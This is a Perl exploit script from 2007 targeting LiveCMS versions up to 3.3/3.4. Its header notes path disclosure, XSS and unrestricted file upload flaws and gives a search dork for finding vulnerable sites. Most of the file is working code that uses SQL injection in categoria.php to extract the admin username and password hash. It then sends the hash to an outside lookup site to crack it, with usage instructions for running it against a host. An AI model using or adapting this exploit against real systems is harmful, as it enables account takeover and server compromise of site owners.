#!/usr/bin/perl ############################################################################################## # ___ ___ _ # / _ \ / _ \ | | # __ _| | | | | | |_ __ ___ _ __ ___| |_ # / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| # __/ | # |___/ ############################################################################################### #INFO: #Program Title ################################################################################ #LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload # #Description ################################################################################## #This is a free CMS system. # #Script Download ############################################################################## #http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460 #http://livecms.com # #Original Advisory ############################################################################# #http://www.g00ns-forum.net/showthread.php?t=9350 # #Exploit ####################################################################################### #credz to Vipsta and Clorox for vulnerability #[c]ode by TrinTiTTY (2007) www.g00ns.net #shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, #fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, , Bernard, and everyone else at g00ns.net # #Details ####################################################################################### #APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined #variable. example: categoria.php?cid=' #XSS: Article names are not properly santised, a user could insert malicious javascript #AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types #can be uploaded. A user could upload a malicious script with this method and compromise the server. #GoogleDork: "powered by livecms" # ################################################################################################ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # LiveCMS <= 3.3 [ categoria.php ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by Vipsta and Clorox # # # # # # [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# use LWP; $host = @ARGV[0]; $ua = LWP::UserAgent->new; my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; if (@ARGV < 1){&top( );&usage( )} elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} else { &getUser( ) } sub getUser( ) { system("color 4"); &top( ); print "\n [~] Retrieving admin username\n"; $nameres = $ua->get("http://$host/$uject"); $namecon = $nameres->content; if ($namecon =~ /(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi) { $user = $4; print "\n [+] Admin user retrieved: $user\n"; print "\n [~] Retrieving password for $user\n"; getPass( ) } else { print "\n [-] Unable to retrieve admin username\n"; print "\n [~] Retrieving password\n"; getPass( ) } } sub getPass( ) { $passres = $ua->get("http://$host/$pject"); $passCon = $passres->content; if ($passCon =~ /(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi) { $pass = $4; print "\n [+] Admin password retrieved: $pass\n"; &resolveHash($pass); system("color 7"); } else { print "\n [-] Unable to retrieve admin password\n"; system("color 7"); exit(0); } } sub resolveHash($) { print "\n [~] Attempting to resolve hash\n"; $hashget = LWP::UserAgent->new; #thx gdata $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash $hashans = $resp->content; if ($hashans =~ m\width="35%">([ -_a-z0-9.*?&=;<>/""]{1,25})\){ $crack = $1; print "\n [+] Password hash resolved: $crack\n"; system("color 7"); exit(0); } else { print "\n [-] Couldn't resolve hash\n"; system("color 7"); exit(0); } } sub top( ) { print q { ################################################################## # LiveCMS <= 3.3 [ categoria.php ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by Vipsta and Clorox # ################################################################## } } sub usage( ) { print "\n Usage: perl livecms33.pl \n"; print "\n Example: perl livecms33.pl www.example.com/path\n\n"; exit(0); } # milw0rm.com [2007-06-20]

Query Builder